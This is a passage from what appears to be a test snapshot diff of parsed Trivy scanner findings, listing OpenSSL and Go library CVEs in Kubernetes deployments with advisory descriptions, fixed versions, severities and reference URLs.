"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3712.json", + "https://access.redhat.com/security/cve/CVE-2021-3712", + "https://cert-portal.siemens.com/productcert/pdf/ssa-244969.pdf", + "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3712", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=94d23fcff9b2a7a8368dfe52214d5c2569882c11", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=ccb0a11145ee72b042d10593a64eaf9e8a55ec12", + "https://github.com/advisories/GHSA-q9wj-f4qw-6vfj", + "https://kc.mcafee.com/corporate/index?page=content&id=SB10366", + "https://linux.oracle.com/cve/CVE-2021-3712.html", + "https://linux.oracle.com/errata/ELSA-2022-9023.html", + "https://lists.apache.org/thread.html/r18995de860f0e63635f3008fd2a6aca82394249476d21691e7c59c9e@%3Cdev.tomcat.apache.org%3E", + "https://lists.apache.org/thread.html/rad5d9f83f0d11fb3f8bb148d179b8a9ad7c6a17f18d70e5805a713d1@%3Cdev.tomcat.apache.org%3E", + "https://lists.debian.org/debian-lts-announce/2021/09/msg00014.html", + "https://lists.debian.org/debian-lts-announce/2021/09/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-3712", + "https://rustsec.org/advisories/RUSTSEC-2021-0098.html", + "https://security.gentoo.org/glsa/202209-02", + "https://security.gentoo.org/glsa/202210-02", + "https://security.netapp.com/advisory/ntap-20210827-0010/", + "https://ubuntu.com/security/notices/USN-5051-1", + "https://ubuntu.com/security/notices/USN-5051-2", + "https://ubuntu.com/security/notices/USN-5051-3", + "https://ubuntu.com/security/notices/USN-5051-4 (regression only in trusty/esm)", + "https://ubuntu.com/security/notices/USN-5088-1", + "https://www.cve.org/CVERecord?id=CVE-2021-3712", + "https://www.debian.org/security/2021/dsa-4963", + "https://www.openssl.org/news/secadv/20210824.txt", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpujan2022.html", + "https://www.oracle.com/security-alerts/cpuoct2021.html", + "https://www.tenable.com/security/tns-2021-16", + "https://www.tenable.com/security/tns-2022-02", + ], + }, + "category": "Vulnerability", + "description": "ASN.1 strings are represented internally within OpenSSL as an ASN1_STRING structure which contains a buffer holding the string data and a field holding the buffer length. This contrasts with normal C strings which are repesented as a buffer for the string data which is terminated with a NUL (0) byte. Although not a strict requirement, ASN.1 strings that are parsed using OpenSSL's own "d2i" functions (and other similar parsing functions) as well as any string whose value has been set with the ASN1_STRING_set() function will additionally NUL terminate the byte array in the ASN1_STRING structure. However, it is possible for applications to directly construct valid ASN1_STRING structures which do not NUL terminate the byte array by directly setting the "data" and "length" fields in the ASN1_STRING array. This can also happen by using the ASN1_STRING_set0() function. Numerous OpenSSL functions that print ASN.1 data have been found to assume that the ASN1_STRING byte array will be NUL terminated, even though this is not guaranteed for strings that have been directly constructed. Where an application requests an ASN.1 structure to be printed, and where that ASN.1 structure contains ASN1_STRINGs that have been directly constructed by the application without NUL terminating the "data" field, then a read buffer overrun can occur. The same thing can also occur during name constraints processing of certificates (for example if a certificate has been directly constructed by the application instead of loading it via the OpenSSL parsing functions, and the certificate contains non NUL terminated ASN1_STRING structures). It can also occur in the X509_get1_email(), X509_REQ_get1_email() and X509_get1_ocsp() functions. If a malicious actor can cause an application to directly construct an ASN1_STRING and then process it through one of the affected OpenSSL functions then this issue could be hit. This might result in a crash (causing a Denial of Service attack). It could also result in the disclosure of private memory contents (such as private keys, or sensitive plaintext). Fixed in OpenSSL 1.1.1l (Affected 1.1.1-1.1.1k). Fixed in OpenSSL 1.0.2za (Affected 1.0.2-1.0.2y).", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": undefined, + "name": "openssl: Read buffer overruns processing ASN.1 strings", + "references": [ { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:7129", + "value": "https://avd.aquasec.com/nvd/cve-2021-3712", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-69cg-p879-7622", + "value": "http://www.openwall.com/lists/oss-security/2021/08/26/2", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", + "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3712.json", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", + "value": "https://access.redhat.com/security/cve/CVE-2021-3712", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/54658", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-244969.pdf", }, { "type": "URL", - "value": "https://go.dev/cl/428735", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", }, { "type": "URL", - "value": "https://go.dev/issue/54658", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3712", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=94d23fcff9b2a7a8368dfe52214d5c2569882c11", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=ccb0a11145ee72b042d10593a64eaf9e8a55ec12", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", + "value": "https://github.com/advisories/GHSA-q9wj-f4qw-6vfj", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-27664.html", + "value": "https://kc.mcafee.com/corporate/index?page=content&id=SB10366", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2802.html", + "value": "https://linux.oracle.com/cve/CVE-2021-3712.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", + "value": "https://linux.oracle.com/errata/ELSA-2022-9023.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", + "value": "https://lists.apache.org/thread.html/r18995de860f0e63635f3008fd2a6aca82394249476d21691e7c59c9e@%3Cdev.tomcat.apache.org%3E", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", + "value": "https://lists.apache.org/thread.html/rad5d9f83f0d11fb3f8bb148d179b8a9ad7c6a17f18d70e5805a713d1@%3Cdev.tomcat.apache.org%3E", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0969", + "value": "https://lists.debian.org/debian-lts-announce/2021/09/msg00014.html", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202209-26", + "value": "https://lists.debian.org/debian-lts-announce/2021/09/msg00021.html", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220923-0004/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3712", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6038-1", + "value": "https://rustsec.org/advisories/RUSTSEC-2021-0098.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-27664", + "value": "https://security.gentoo.org/glsa/202209-02", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "0.7.0", - "foundIn": "Target: 'coredns' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-41723", - "installedVersion": "v0.0.0-20210614182718-04defd469f4e", - "packageName": "golang.org/x/net", - "references": [ - "https://access.redhat.com/security/cve/CVE-2022-41723", - "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", - "https://go.dev/cl/468135", - "https://go.dev/cl/468295", - "https://go.dev/issue/57855", - "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", - "https://pkg.go.dev/vuln/GO-2023-1571", - "https://vuln.go.dev/ID/GO-2023-1571.json", - "https://www.cve.org/CVERecord?id=CVE-2022-41723", - ], - }, - "category": "Vulnerability", - "description": "A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", - "mitigation": undefined, - "name": "avoid quadratic complexity in HPACK decoding", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-41723", + "value": "https://security.gentoo.org/glsa/202210-02", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-41723", + "value": "https://security.netapp.com/advisory/ntap-20210827-0010/", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", + "value": "https://ubuntu.com/security/notices/USN-5051-1", }, { "type": "URL", - "value": "https://go.dev/cl/468135", + "value": "https://ubuntu.com/security/notices/USN-5051-2", }, { "type": "URL", - "value": "https://go.dev/cl/468295", + "value": "https://ubuntu.com/security/notices/USN-5051-3", }, { "type": "URL", - "value": "https://go.dev/issue/57855", + "value": "https://ubuntu.com/security/notices/USN-5051-4 (regression only in trusty/esm)", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", + "value": "https://ubuntu.com/security/notices/USN-5088-1", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-3712", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", + "value": "https://www.debian.org/security/2021/dsa-4963", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", + "value": "https://www.openssl.org/news/secadv/20210824.txt", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", + "value": "https://www.oracle.com/security-alerts/cpujan2022.html", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2023-1571", + "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", }, { "type": "URL", - "value": "https://vuln.go.dev/ID/GO-2023-1571.json", + "value": "https://www.tenable.com/security/tns-2021-16", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-41723", + "value": "https://www.tenable.com/security/tns-2022-02", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.4.0", - "foundIn": "Target: 'coredns' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-41717", - "installedVersion": "v0.0.0-20210614182718-04defd469f4e", - "packageName": "golang.org/x/net", + "fixedVersion": "1.1.1n-r0", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2022-0778", + "installedVersion": "1.1.1g-r0", + "packageName": "libcrypto1.1", "references": [ - "https://access.redhat.com/errata/RHSA-2023:2367", - "https://access.redhat.com/security/cve/CVE-2022-41717", - "https://bugzilla.redhat.com/2092793", - "https://bugzilla.redhat.com/2161274", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", - "https://errata.almalinux.org/9/ALSA-2023-2367.html", - "https://github.com/advisories/GHSA-xrjj-mj9h-534m", - "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", - "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", - "https://go.dev/cl/455635", - "https://go.dev/cl/455717", - "https://go.dev/issue/56350", - "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", - "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", - "https://linux.oracle.com/cve/CVE-2022-41717.html", - "https://linux.oracle.com/errata/ELSA-2023-2866.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", - "https://pkg.go.dev/vuln/GO-2022-1144", - "https://ubuntu.com/security/notices/USN-6038-1", - "https://www.cve.org/CVERecord?id=CVE-2022-41717", + "http://packetstormsecurity.com/files/167344/OpenSSL-1.0.2-1.1.1-3.0-BN_mod_sqrt-Infinite-Loop.html", + "http://seclists.org/fulldisclosure/2022/May/33", + "http://seclists.org/fulldisclosure/2022/May/35", + "http://seclists.org/fulldisclosure/2022/May/38", + "https://access.redhat.com/errata/RHSA-2022:5326", + "https://access.redhat.com/security/cve/CVE-2022-0778", + "https://bugzilla.redhat.com/2062202", + "https://bugzilla.redhat.com/show_bug.cgi?id=2062202", + "https://cert-portal.siemens.com/productcert/pdf/ssa-712929.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0778", + "https://errata.almalinux.org/8/ALSA-2022-5326.html", + "https://errata.rockylinux.org/RLSA-2022:4899", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=3118eb64934499d93db3230748a452351d1d9a65", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=380085481c64de749a6dd25cdf0bcf4360b30f83", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=a466912611aa6cbdf550cd10601390e587451246", + "https://github.com/advisories/GHSA-x3mh-jvjw-3xwx", + "https://linux.oracle.com/cve/CVE-2022-0778.html", + "https://linux.oracle.com/errata/ELSA-2022-9272.html", + "https://lists.debian.org/debian-lts-announce/2022/03/msg00023.html", + "https://lists.debian.org/debian-lts-announce/2022/03/msg00024.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/323SNN6ZX7PRJJWP2BUAFLPUAE42XWLZ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GDB3GQVJPXJE7X5C5JN6JAA4XUDWD6E6/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/W6K3PR542DXWLEFFMFIDMME4CWMHJRMG/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-0778", + "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0002", + "https://rustsec.org/advisories/RUSTSEC-2022-0014.html", + "https://security.gentoo.org/glsa/202210-02", + "https://security.netapp.com/advisory/ntap-20220321-0002/", + "https://security.netapp.com/advisory/ntap-20220429-0005/", + "https://support.apple.com/kb/HT213255", + "https://support.apple.com/kb/HT213256", + "https://support.apple.com/kb/HT213257", + "https://ubuntu.com/security/notices/USN-5328-1", + "https://ubuntu.com/security/notices/USN-5328-2", + "https://www.cve.org/CVERecord?id=CVE-2022-0778", + "https://www.debian.org/security/2022/dsa-5103", + "https://www.openssl.org/news/secadv/20220315.txt", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpujul2022.html", + "https://www.tenable.com/security/tns-2022-06", + "https://www.tenable.com/security/tns-2022-07", + "https://www.tenable.com/security/tns-2022-08", + "https://www.tenable.com/security/tns-2022-09", ], }, "category": "Vulnerability", - "description": "An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests. HTTP/2 server connections contain a cache of HTTP header keys sent by the client. While the total number of entries in this cache is capped, an attacker sending very large keys can cause the server to allocate approximately 64 MiB per open connection.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", + "description": "The BN_mod_sqrt() function, which computes a modular square root, contains a bug that can cause it to loop forever for non-prime moduli. Internally this function is used when parsing certificates that contain elliptic curve public keys in compressed form or explicit elliptic curve parameters with a base point encoded in compressed form. It is possible to trigger the infinite loop by crafting a certificate that has invalid explicit curve parameters. Since certificate parsing happens prior to verification of the certificate signature, any process that parses an externally supplied certificate may thus be subject to a denial of service attack. The infinite loop can also be reached when parsing crafted private keys as they can contain explicit elliptic curve parameters. Thus vulnerable situations include: - TLS clients consuming server certificates - TLS servers consuming client certificates - Hosting providers taking certificates or private keys from customers - Certificate authorities parsing certification requests from subscribers - Anything else which parses ASN.1 elliptic curve parameters Also any other applications that use the BN_mod_sqrt() where the attacker can control the parameter values are vulnerable to this DoS issue. In the OpenSSL 1.0.2 version the public key is not parsed during initial parsing of the certificate which makes it slightly harder to trigger the infinite loop. However any operation which requires the public key from the certificate will trigger the infinite loop. In particular the attacker can use a self-signed certificate to trigger the loop during verification of the certificate signature. This issue affects OpenSSL versions 1.0.2, 1.1.1 and 3.0. It was addressed in the releases of 1.1.1n and 3.0.2 on the 15th March 2022. Fixed in OpenSSL 3.0.2 (Affected 3.0.0,3.0.1). Fixed in OpenSSL 1.1.1n (Affected 1.1.1-1.1.1m). Fixed in OpenSSL 1.0.2zd (Affected 1.0.2-1.0.2zc).", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "excessive memory growth in a Go server accepting HTTP/2 requests", + "name": "openssl: Infinite loop in BN_mod_sqrt() reachable when parsing certificates", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-41717", + "value": "https://avd.aquasec.com/nvd/cve-2022-0778", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2367", + "value": "http://packetstormsecurity.com/files/167344/OpenSSL-1.0.2-1.1.1-3.0-BN_mod_sqrt-Infinite-Loop.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-41717", + "value": "http://seclists.org/fulldisclosure/2022/May/33", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2092793", + "value": "http://seclists.org/fulldisclosure/2022/May/35", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2161274", + "value": "http://seclists.org/fulldisclosure/2022/May/38", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", + "value": "https://access.redhat.com/errata/RHSA-2022:5326", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2367.html", + "value": "https://access.redhat.com/security/cve/CVE-2022-0778", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-xrjj-mj9h-534m", + "value": "https://bugzilla.redhat.com/2062202", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2062202", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-712929.pdf", }, { "type": "URL", - "value": "https://go.dev/cl/455635", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0778", }, { "type": "URL", - "value": "https://go.dev/cl/455717", + "value": "https://errata.almalinux.org/8/ALSA-2022-5326.html", }, { "type": "URL", - "value": "https://go.dev/issue/56350", + "value": "https://errata.rockylinux.org/RLSA-2022:4899", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=3118eb64934499d93db3230748a452351d1d9a65", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=380085481c64de749a6dd25cdf0bcf4360b30f83", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-41717.html", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=a466912611aa6cbdf550cd10601390e587451246", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2866.html", + "value": "https://github.com/advisories/GHSA-x3mh-jvjw-3xwx", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", + "value": "https://linux.oracle.com/cve/CVE-2022-0778.html", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-1144", + "value": "https://linux.oracle.com/errata/ELSA-2022-9272.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6038-1", + "value": "https://lists.debian.org/debian-lts-announce/2022/03/msg00023.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-41717", + "value": "https://lists.debian.org/debian-lts-announce/2022/03/msg00024.html", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": "0.0.0-20220412211240-33da011f77ad", - "foundIn": "Target: 'coredns' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-29526", - "installedVersion": "v0.0.0-20210917161153-d61c044b1678", - "packageName": "golang.org/x/sys", - "references": [ - "https://access.redhat.com/security/cve/CVE-2022-29526", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29526", - "https://github.com/advisories/GHSA-p782-xgp4-8hr8", - "https://github.com/golang/go/commit/f66925e854e71e0c54b581885380a490d7afa30c", - "https://github.com/golang/go/issues/52313", - "https://go.dev/cl/399539", - "https://go.dev/cl/400074", - "https://go.dev/issue/52313", - "https://groups.google.com/g/golang-announce", - "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", - "https://linux.oracle.com/cve/CVE-2022-29526.html", - "https://linux.oracle.com/errata/ELSA-2022-5337.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q6GE5EQGE4L2KRVGW4T75QVIYAXCLO5X/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", - "https://pkg.go.dev/vuln/GO-2022-0493", - "https://security.gentoo.org/glsa/202208-02", - "https://security.netapp.com/advisory/ntap-20220729-0001/", - "https://ubuntu.com/security/notices/USN-6038-1", - "https://www.cve.org/CVERecord?id=CVE-2022-29526", - ], - }, - "category": "Vulnerability", - "description": "Go before 1.17.10 and 1.18.x before 1.18.2 has Incorrect Privilege Assignment. When called with a non-zero flags parameter, the Faccessat function could incorrectly report that a file is accessible.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", - "mitigation": undefined, - "name": "faccessat checks wrong group", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-29526", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/323SNN6ZX7PRJJWP2BUAFLPUAE42XWLZ/", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-29526", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GDB3GQVJPXJE7X5C5JN6JAA4XUDWD6E6/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29526", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/W6K3PR542DXWLEFFMFIDMME4CWMHJRMG/", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-p782-xgp4-8hr8", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-0778", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/f66925e854e71e0c54b581885380a490d7afa30c", + "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0002", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/52313", + "value": "https://rustsec.org/advisories/RUSTSEC-2022-0014.html", }, { "type": "URL", - "value": "https://go.dev/cl/399539", + "value": "https://security.gentoo.org/glsa/202210-02", }, { "type": "URL", - "value": "https://go.dev/cl/400074", + "value": "https://security.netapp.com/advisory/ntap-20220321-0002/", }, { "type": "URL", - "value": "https://go.dev/issue/52313", + "value": "https://security.netapp.com/advisory/ntap-20220429-0005/", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce", + "value": "https://support.apple.com/kb/HT213255", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", + "value": "https://support.apple.com/kb/HT213256", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-29526.html", + "value": "https://support.apple.com/kb/HT213257", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-5337.html", + "value": "https://ubuntu.com/security/notices/USN-5328-1", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q6GE5EQGE4L2KRVGW4T75QVIYAXCLO5X/", + "value": "https://ubuntu.com/security/notices/USN-5328-2", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-0778", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", + "value": "https://www.debian.org/security/2022/dsa-5103", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "value": "https://www.openssl.org/news/secadv/20220315.txt", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0493", + "value": "https://www.oracle.com/security-alerts/cpujul2022.html", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202208-02", + "value": "https://www.tenable.com/security/tns-2022-06", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220729-0001/", + "value": "https://www.tenable.com/security/tns-2022-07", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6038-1", + "value": "https://www.tenable.com/security/tns-2022-08", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-29526", + "value": "https://www.tenable.com/security/tns-2022-09", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.3.7", - "foundIn": "Target: 'coredns' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2021-38561", - "installedVersion": "v0.3.6", - "packageName": "golang.org/x/text", + "fixedVersion": "1.1.1i-r0", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2020-1971", + "installedVersion": "1.1.1g-r0", + "packageName": "libcrypto1.1", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-38561", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38561", - "https://deps.dev/advisory/OSV/GO-2021-0113", - "https://github.com/advisories/GHSA-ppp9-7jff-5vj2", - "https://go.dev/cl/340830", - "https://go.googlesource.com/text/+/383b2e75a7a4198c42f8f87833eefb772868a56f", - "https://groups.google.com/g/golang-announce", - "https://nvd.nist.gov/vuln/detail/CVE-2021-38561", - "https://pkg.go.dev/golang.org/x/text/language", - "https://pkg.go.dev/vuln/GO-2021-0113", - "https://ubuntu.com/security/notices/USN-5873-1", - "https://www.cve.org/CVERecord?id=CVE-2021-38561", + "http://www.openwall.com/lists/oss-security/2021/09/14/2", + "https://access.redhat.com/security/cve/CVE-2020-1971", + "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1971", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2154ab83e14ede338d2ede9bbe5cdfce5d5a6c9e", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=f960d81215ebf3f65e03d4d5d857fb9b666d6920", + "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44676", + "https://linux.oracle.com/cve/CVE-2020-1971.html", + "https://linux.oracle.com/errata/ELSA-2021-9150.html", + "https://lists.apache.org/thread.html/r63c6f2dd363d9b514d0a4bcf624580616a679898cc14c109a49b750c@%3Cdev.tomcat.apache.org%3E", + "https://lists.apache.org/thread.html/rbb769f771711fb274e0a4acb1b5911c8aab544a6ac5e8c12d40c5143@%3Ccommits.pulsar.apache.org%3E", + "https://lists.debian.org/debian-lts-announce/2020/12/msg00020.html", + "https://lists.debian.org/debian-lts-announce/2020/12/msg00021.html", + 